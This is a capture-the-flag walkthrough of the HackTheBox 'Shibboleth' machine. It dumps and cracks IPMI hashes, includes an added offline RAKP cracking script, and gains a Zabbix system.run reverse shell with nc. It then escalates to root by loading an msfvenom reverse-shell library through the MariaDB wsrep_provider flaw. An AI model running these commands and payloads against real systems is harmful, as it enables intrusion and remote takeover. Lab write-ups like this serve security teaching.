HackTheBox – Shibboleth Walkthrough – In English
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.124
┌──(rootkali)-[/home/kali/Downloads]
└─# cat /etc/hosts | grep 10.10.11.124
┌──(rootkali)-[/home/kali/Downloads]
└─# ffuf -u http://shibboleth.htb/FUZZ -t 100 -sf -e php,txt,html,js -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -ic -c
┌──(rootkali)-[/home/kali/Downloads]
└─# ffuf -u http://shibboleth.htb/ -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 -H "Host: FUZZ.shibboleth.htb" -fc 302
┌──(rootkali)-[/home/kali/Downloads]
└─# echo "10.10.11.124 monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb" | sudo tee -a /etc/hosts
The new vhosts all lead to a Zabbix login page. A quick Google search turned up the default credentials Admin:zabbix, but they are not accepted here.
After spending a lot of time on port 80 without progress, I ran a UDP scan, which turned up one open port: 623.
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -sU -sC -sV shibboleth.htb -T4
Port 623/UDP is IPMI, the out-of-band management protocol spoken by baseboard management controllers (BMCs) for remote server management. I had never heard of it before, so I looked for known weaknesses.
msf6 > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > show options
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run
msf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_version) > exploit
msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
Hash (as printed by the module, in user:salt:authcode form; hashcat mode 7300 expects only salt:authcode, so drop the leading "Administrator:" in hash.txt or pass --username):
Administrator:02fb08888201000033e2f01b8b8b8d0b1616ff5ea39d8db4c975925effd3d2a2eeb9b3cf483e1f91a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:440767ae6339a2523a033995b3fe41128cb0321b
┌──(rootkali)-[/home/kali/Downloads]
└─# hashcat -m 7300 hash.txt /home/kali/Downloads/rockyou.txt
Username: Administrator
Password: ilovepumkinpie1
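Why this hash cracks offline at all: in RAKP authentication the BMC answers RAKP message 1 with message 2, which carries an HMAC-SHA1 keyed with the user's password over data the client already knows (both session IDs, both nonces, the BMC GUID, the privilege byte and the username), before the client has proven anything. The following script is an added example, not code from the walkthrough, Metasploit or hashcat: it decodes the salt of the hash line above, replays the BMC's computation over a small constructed wordlist standing in for rockyou.txt, and uses a fake BMC (simulate_dump, an invented helper) so the whole flow runs with no network. Recovery of the walkthrough's password from PAGE_HASH_LINE assumes the line was pasted intact.

```python
#!/usr/bin/env python3
"""Offline cracking of an IPMI 2.0 RAKP HMAC-SHA1 hash (hashcat mode 7300).

Added example for this walkthrough; not part of the original post or of
Metasploit/hashcat.  The BMC side is simulated so everything runs offline.
"""
import hashlib
import hmac
import os
import struct
from typing import Dict, Iterable, Optional, Tuple

# Hash line as printed by ipmi_dumphashes in the walkthrough (user:salt:authcode).
PAGE_HASH_LINE = (
    "Administrator:"
    "02fb08888201000033e2f01b8b8b8d0b1616ff5ea39d8db4c975925effd3d2a2eeb9b3cf483e1f91"
    "a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72"
    ":440767ae6339a2523a033995b3fe41128cb0321b"
)


def rakp2_salt(console_sid: bytes, bmc_sid: bytes, console_rand: bytes,
               bmc_rand: bytes, bmc_guid: bytes, priv: int, username: str) -> bytes:
    """Bytes the BMC authenticates in RAKP message 2 (IPMI 2.0 spec, 13.31)."""
    user = username.encode()
    assert len(console_sid) == 4 and len(bmc_sid) == 4
    assert len(console_rand) == 16 and len(bmc_rand) == 16 and len(bmc_guid) == 16
    return (console_sid + bmc_sid + console_rand + bmc_rand + bmc_guid
            + struct.pack("BB", priv, len(user)) + user)


def bmc_rakp2_authcode(password: str, salt: bytes) -> bytes:
    """Key-exchange authentication code a BMC puts in RAKP message 2.

    IPMI keys the HMAC with the password zero-padded to a 20-byte KUID; HMAC
    already zero-pads short keys, so the raw password yields the same value.
    """
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def parse_hash_line(line: str) -> Tuple[str, bytes, bytes]:
    """Split a dumped 'user:salt_hex:authcode_hex' line into (user, salt, authcode)."""
    user, salt_hex, auth_hex = line.strip().split(":")
    return user, bytes.fromhex(salt_hex), bytes.fromhex(auth_hex)


def decode_salt(salt: bytes) -> Dict[str, object]:
    """Recover the RAKP-2 fields from a salt, to sanity-check a dumped hash."""
    if len(salt) < 58:
        raise ValueError("salt too short for a RAKP-2 message")
    priv, ulen = salt[56], salt[57]
    if len(salt) != 58 + ulen:
        raise ValueError("username length byte does not match salt length")
    return {
        "console_sid": salt[0:4],
        "bmc_sid": salt[4:8],
        "console_rand": salt[8:24],
        "bmc_rand": salt[24:40],
        "bmc_guid": salt[40:56],
        # low nibble: 4 = Administrator; bit 4: "name-only lookup" flag
        "priv_level": priv & 0x0F,
        "name_only_lookup": bool(priv & 0x10),
        "username": salt[58:].decode(errors="replace"),
    }


def crack(user: str, salt: bytes, authcode: bytes,
          candidates: Iterable[str]) -> Optional[str]:
    """Replay the BMC's computation per candidate until the authcode matches."""
    if decode_salt(salt)["username"] != user:
        raise ValueError("username in the hash line does not match the salt")
    for password in candidates:
        if hmac.compare_digest(bmc_rakp2_authcode(password, salt), authcode):
            return password
    return None


def simulate_dump(username: str, password: str) -> str:
    """Invented helper: play RAKP 1/2 against a fake BMC that knows `password`
    and emit the line ipmi_dumphashes would print.  No network involved."""
    salt = rakp2_salt(os.urandom(4), os.urandom(4), os.urandom(16),
                      os.urandom(16), os.urandom(16), 0x14, username)
    return f"{username}:{salt.hex()}:{bmc_rakp2_authcode(password, salt).hex()}"


if __name__ == "__main__":
    # Constructed mini wordlist standing in for rockyou.txt.
    wordlist = ["password", "admin", "zabbix", "ilovepumkinpie1"]
    user, salt, authcode = parse_hash_line(PAGE_HASH_LINE)
    for field, value in decode_salt(salt).items():
        print(f"{field:>17}: {value.hex() if isinstance(value, bytes) else value}")
    # Recovers the walkthrough's password if the hash line was pasted intact.
    print("page hash     ->", crack(user, salt, authcode, wordlist))
    fake = parse_hash_line(simulate_dump("Administrator", "s3cret"))
    print("simulated BMC ->", crack(*fake, ["nope", "s3cret"]))
```

The decoded salt shows the privilege byte 0x14 (Administrator with the name-only lookup flag set) and the username "Administrator" in clear, which is why the Metasploit module only needs a list of plausible usernames, never a password, to collect hashes.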
The recovered password also works on the Zabbix login. Navigate to Configuration → Hosts and the monitored host is listed there. Each host has sections for Items, Triggers, Web scenarios, etc.; we are interested in Items. Click Items → Create item and use a system.run key, which makes the Zabbix agent on that host execute an arbitrary command. This only works because the agent permits it (EnableRemoteCommands=1 on agents before 5.0, or an AllowKey=system.run[*] entry on 5.0 and later); a hardened agent denies system.run.
Key: system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.102 1234 >/tmp/f,nowait]
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -nlvp 1234
Start the nc listener first, then click the "Test" button → "Get value" on the item: the agent runs the command and the reverse shell connects back.
$ cat /etc/passwd
$ cd /home
$ ls
$ cd ipmi-svc
$ ls
$ cat user.txt
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
zabbix@shibboleth:/home/ipmi-svc$ su ipmi-svc        # the IPMI Administrator password is reused here
ipmi-svc@shibboleth:/etc/zabbix$ netstat -antp
With the user flag and the ipmi-svc account in hand, netstat shows MySQL listening locally, so I grep for passwords and find the Zabbix database password in the /etc/zabbix directory.
ipmi-svc@shibboleth:~$ grep -iR 'password' /etc/zabbix/ 2>/dev/null
DBPassword=bloooarskybluh
ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -p -D zabbix
Enter password: bloooarskybluh
┌──(rootkali)-[/home/kali/Downloads]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.102 LPORT=4001 -f elf-so -o test.so
┌──(rootkali)-[/home/kali/Downloads]
└─# python -m http.server 80
MariaDB [zabbix]> quit
ipmi-svc@shibboleth:/etc/zabbix$ cd /tmp
ipmi-svc@shibboleth:/tmp$ wget http://10.10.14.102/test.so
ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -p -D zabbix
Enter password: bloooarskybluh
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 4001
MariaDB [zabbix]> SET GLOBAL wsrep_provider='/tmp/test.so';
Setting wsrep_provider makes MariaDB dlopen() the given path as a shared library (CVE-2021-27928, fixed in 10.2.37/10.3.28/10.4.18/10.5.9), so the msfvenom payload's constructor runs inside the mysqld process with whatever privileges mysqld has. It needs SUPER, which the zabbix DB user has here, and the shell lands on the port 4001 listener.